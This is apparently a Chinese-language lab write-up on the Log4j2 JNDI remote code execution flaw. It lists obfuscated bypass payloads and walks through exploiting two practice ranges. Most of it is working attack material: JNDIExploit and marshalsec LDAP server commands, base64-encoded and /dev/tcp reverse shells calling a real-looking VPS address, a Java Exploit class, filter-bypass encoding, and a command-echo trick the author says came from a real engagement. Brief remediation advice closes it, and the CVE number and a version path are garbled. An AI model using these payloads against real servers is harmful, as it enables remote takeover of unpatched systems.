目录
一、漏洞描述
二、漏洞复现
1. bugku靶场
反弹shell
命令执行
2. 掌控安全
反弹shell
三、Burp扫描插件
四、修复建议
一、漏洞描述
11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。12月9号进行了漏洞预警,然后整个安全圈就过年了。
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
漏洞编号:CVE--44228
影响范围:Apache Log4j 2.x < 2.15.0-rc2
payload
${jndi:ldap://}
bypass
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
二、漏洞复现
1. bugku靶场
地址:/challenges/detail/id/340.html
访问地址,可见一个登陆框
这里使用dnslog进行探测,dnslog平台 ——>DNSLOG Platform
在用户名字段插入poc,密码字段因为数据加密了所以不行
${jndi:ldap://e4953331.dns..}
dns平台接收如下,说明漏洞存在
再输入一个bypass payload,dns平台都能接收
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://e4953331.dns../poc}
反弹shell
工具:JNDIExploit-1.2-SNAPSHOT.jar
1. 开启LDAP
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的ip
2.base64编码反弹shell命令
nc x.x.x.x 6666 -e /bin/sh
3. 将编码后的命令插入如下
${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/base64编码后的命令}
即
${jndi:ldap://39.100.88.162:1389/Basic/Command/Base64/bmMgMzkuMTAwLjg4LjE2MiA2NjY2IC1lIC9iaW4vc2g=}
4. 开启监听
nc -lvnp 6666
5. 发送payload
如下 成功反弹shell
命令执行
ps: 有时候会过滤某个字符,然后页面显示400,此时可以尝试将此字符进行url编码。以下来自与我的真实项目
1. 开启LDAP监听
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的ip
2. 命令执行
/TomcatBypass/TomcatEcho对
命令执行结果回显。由于这里对{}和进行了过滤,所以对其编码
# ${jndi:ldap://39.100.88.162:1389/TomcatBypass/TomcatEcho}$%7bjndi:ldap://39.100.88.162:1389/TomcatBypass/TomcatEcho%7d #header头中加入cmd: 命令
或者
2. 掌控安全
靶场地址:http://d63bb2586./
1. 漏洞检测
存在
反弹shell
此靶场用上面一种反弹shell的方法并不能成功
1. 编辑Exploit.java文件
反弹shell端口为6666
public class Exploit {public Exploit(){try{// 要执行的命令String[] commands = {"bash","-c","exec 5<>/dev/tcp/39.xx.xx.162/6666;cat <&5 | while read line; do $line 2>&5 >&5; done"};Process pc = Runtime.getRuntime().exec(commands);pc.waitFor();} catch(Exception e){e.printStackTrace();}}public static void main(String[] argv) {Exploit e = new Exploit();}}
编译java文件
javac Exploit.java
生成如下两个文件,上传至vps
2. 开启web服务
python -m http.server 80
3. 开启LDAP服务
工具——>marshalsec-0.0.3-SNAPSHOT-all.jar
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://39.100.88.162/#Exploit"
此时监听端口1389
4. 触发payload
${jndi:ldap://39.100.88.162:1389/Exploit}
三、Burp扫描插件
1.log4j2burpscanner主动动扫描插件
该插件会主动扫描漏洞,也可以自己手动选择如下
如果存在漏洞
四、修复建议
官方方案
1、将Log4j框架升级到2.15.0版本:
org/apache/loging/logj/logj-core/5.0
不要用2.15.0-rc1和2.15.0-rc2
临时方案
1、升级JDK
2、修改log4j配置
①设置参数:
log4j2.formatMsgNoLookups=True
②修改jvm参数:
-Dlog4j2.formatMsgNoLookups=true
③系统环境变量:
FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true
④禁止log4j2所在的服务器外连
3、使用安全产品防护:WAF、RASP